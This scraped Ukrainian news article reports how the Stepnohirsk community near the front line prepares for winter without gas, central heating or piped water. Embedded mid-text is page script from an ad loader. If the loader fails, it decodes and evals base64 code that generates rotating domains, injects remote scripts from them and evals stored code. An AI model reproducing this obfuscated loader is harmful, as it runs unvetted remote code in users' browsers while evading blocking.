До 24 лютого в Степногірській територіальній громаді проживало 9,5 тис. людей. Нині три населених пункти громади окуповано, на підконтрольній Україні території лишилося чотири, з яких виїхали понад половина мешканців.
Суспільне поспілкувалося про долю місцевих жителів напередодні холодів з головою громади Іриною Кондратюк.
Демографічна ситуація та гуманітарні проблеми
За словами голови, багато людей продовжує проживати у селі Приморське і в Степногірську. Загалом з Приморського виїхало майже 50%, зі Степногірська більше — лишилися близько 30%. Є ще два села, звідкіля повністю виїхали люди, і де вже вщент зруйновані будинки. Люди, які залишаються в громаді не виїжджають, бо не мають куди їхати, і загалом не мають грошей на життя.
Фото: Суспільне Запоріжжя
До громади, зокрема до Степногірська і с. Приморське курсує громадський транспорт, п’ять разів на день. Вартість проїзду на маршрутці в один бік — 50 грн.
У громаді нині працюють продуктові магазини, де можна розрахуватися карткою, а от зняти готівку немає де. Зокрема й пенсіонери, які отримують пенсію на картку, можуть зняти її лише у Запоріжжі. Заборгованості по виплатах пенсій і заробітних плат немає, є питання по виплатах пільг і субсидій, але їх намагаються вирішити, каже Ірина Кондратюк.
“Закриті аптеки в Степногірську і в с. Приморське, на жаль, люди виїхали. На жаль, в Степногірську з медициною не дуже добре, тому що сімейний лікар також виїхав. В с. Приморське є сімейні лікарі, ми звертаємося туди. Працює швидка допомога у нас в Степногірську. Є можливість звернутися на фельдшерський пункт і отримати допомогу».
Також частину функцій цивільної медичної інфраструктури перейняли військові, зокрема допомагають доставляти поранених після обстрілів до лікарень.
Опалювальний сезон та комунікації
Зараз, за словами Ірини Кондратюк, в громаді готуються до опалювального сезону:
“В нас немає централізованого опалення, і в нас ніколи не було природного газу. Ми до війни так і не змогли його довести до Степногірська. Ні в Приморському, ні в населених пунктах, які навколо Степногірська газу не було. Після 2004 року, коли призупинили централізоване опалення, ми перейшли на електроенергію, ми повністю залежимо від електроенергії». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
На зиму планують закупити дров на декілька мільйонів гривень. Придбали десять буржуйок і планують ще п’ять. Їх можна буде встановити у підвальних приміщеннях багатоповерхівок, щоб там можна було перебути певний час перед евакуацією.
«Ми облаштовуємо пункти обігріву і до людей доносимо, що треба буде виїжджати, тому що в приватному секторі є пічки, які можна затопити, а в багатоповерховому будинку не поставиш буржуйку. Ми вже цей досвід мали. Але деякі люди категорично проти. Намагаємося звичайно зараз розселяти максимально людей по приватному сектору, до родичів, до знайомих.»
Фото: Суспільне Запоріжжя
Також місцевим жителям видають будівельні матеріали, аби ремонтувати пошкоджені будинки. Частину будматеріалів видають безплатно, частину люди купують самі.
Загалом зараз у громаді нараховується близько 500 приватних будинків, з яких 260 заселені, а також 14 п’ятиповерхівок, 7 дев’ятиповерхівок, де загалом 1700 квартир.
«Зараз ми більше переймаємося за каналізацію, водовідведення, тому що люди виїхали й опалювати квартири не будуть, і ось в цьому у нас може бути велика проблема. В Степногірську немає централізованого водозабезпечення з 1 березня. Свердловини знаходяться на окупованій території, ми до них добратися не можемо, щоб їх відновити, тому туди ми воду через день завозимо і є у нас приватні свердловини, люди приходять і набирають воду».
Також у Степногірську працює дільниця від обласного водоканалу, куди привозять воду в бочках із Запоріжжя.
Підрахувати збитки завдані окупантами громаді поки неможливо. Недовиконання бюджету на кінець 2022 року складатиме 40%, але в громаді дуже економлять, зокрема на електроенергії. (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/bez-vodi-gazu-ta-opalennya-yak-u-stepnogirsku-gotuyutsya-do-zimi-foto/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook